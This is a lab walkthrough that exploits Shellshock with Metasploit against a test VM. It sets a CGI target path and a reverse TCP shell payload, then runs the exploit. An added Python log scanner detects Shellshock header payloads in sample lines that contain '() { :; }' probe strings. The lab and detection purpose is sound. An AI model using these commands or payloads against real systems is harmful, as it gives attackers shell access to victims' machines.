Shellshock is a security bug that allows an attacker to execute arbitrary commands in a terminal and gain unauthorized access to a victim’s device. Known vulnerabilities are usually assigned an identifier while security experts develop a patch.

Metasploit provides information about security vulnerabilities that can be exploited in a system, and it is mainly used for penetration testing of software and operating systems.

The Kali Linux IP address is 10.0.2.15 and the victim IP address is 10.0.2.5. The two machines are connected via a NAT bridge and run in separate virtual machines.

First, run the Metasploit framework in Kali Linux by typing “msfconsole” in its command line.

When msfconsole starts, it tells you how many exploits can be used in this system.

Type “search shellshock” to see which Shellshock modules can be used with the commands that follow.

Types of Shellshock exploits that can be used against this system

As an example, we want the attacker to gain access to the victim, so we type the following command, which appears in the “search shellshock” results:

use exploit/multi/http/apache_mod_cgi_bash_env_exec

Then we set the local and remote hosts (lhost and rhost), where lhost is the Kali Linux IP address and rhost is the victim IP address. Type the following commands:

set lhost 10.0.2.15

set rhost 10.0.2.5

Once lhost and rhost have been assigned, type the following commands, which set the path of the vulnerability and select one of the payload types:

set targeturi /cgi-bin/status/

set payload linux/x86/shell/reverse_tcp

To see which payloads can be used, simply type “show payloads”.

List of payloads that can be used

Finally, use “check” to make sure that the target is vulnerable to the exploit and “run” to launch it. One result of the exploit is that the attacker gains access to the victim under the victim’s own name and IP address.

The exploit is running
Checking to make sure that the exploit has run successfully

The image above shows the victim’s name and IP address, so the exploit ran successfully.
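From the defender's side, a request like the one sent to /cgi-bin/status/ in this lab leaves a trace in the web server's access log. The following is an added example, not part of the original walkthrough: it scans Apache combined-format log lines for a Referer or User-Agent value that begins with the bash function-definition prefix. The sample lines, the address 10.0.2.7 and the function name are constructed for illustration.

```python
import re

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'  # quoted field; Apache logs embedded quotes as \"
COMBINED = re.compile(
    r'(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED
)

# A vulnerable bash treats an environment value that begins with these four
# characters as a function definition; mod_cgi copies request headers into the
# CGI environment (HTTP_USER_AGENT, HTTP_REFERER, ...).
FUNC_PREFIX = "() {"

def find_shellshock_attempts(lines, cgi_prefix="/cgi-bin/"):
    """Return one dict per log line whose Referer or User-Agent starts with FUNC_PREFIX."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = COMBINED.match(line)
        if not m:
            continue  # not combined format (truncated or custom line): skip it
        src, request, status, referer, agent = m.groups()
        fields = [name for name, value in (("referer", referer), ("agent", agent))
                  if value.startswith(FUNC_PREFIX)]
        if not fields:
            continue
        parts = request.split()
        path = parts[1] if len(parts) >= 2 else ""
        hits.append({"line": number, "src": src, "path": path, "fields": fields,
                     "status": int(status), "to_cgi": path.startswith(cgi_prefix)})
    return hits

# Constructed sample lines (not taken from a real server), using the lab addresses above.
SAMPLE_LOG = [
    '10.0.2.15 - - [12/Mar/2024:10:01:07 +0000] "GET /cgi-bin/status/ HTTP/1.1" 200 412 "-" "() { :; }; echo probe"',
    '10.0.2.7 - - [12/Mar/2024:10:01:09 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.2.15 - - [12/Mar/2024:10:01:12 +0000] "GET /cgi-bin/status/ HTTP/1.1" 200 412 "() { :; }; echo probe" "curl/8.0"',
    '10.0.2.7 - - [12/Mar/2024:10:01:15 +0000] "GET /about.html HTTP/1.1" 200 880 "-" "checker/1.0 () { mid-string"',
    'truncated line without the expected fields',
]

if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(hit)
```

The combined format records only the Referer and User-Agent headers, so a request carrying the prefix in any other header is visible only if the server's LogFormat logs that header as well.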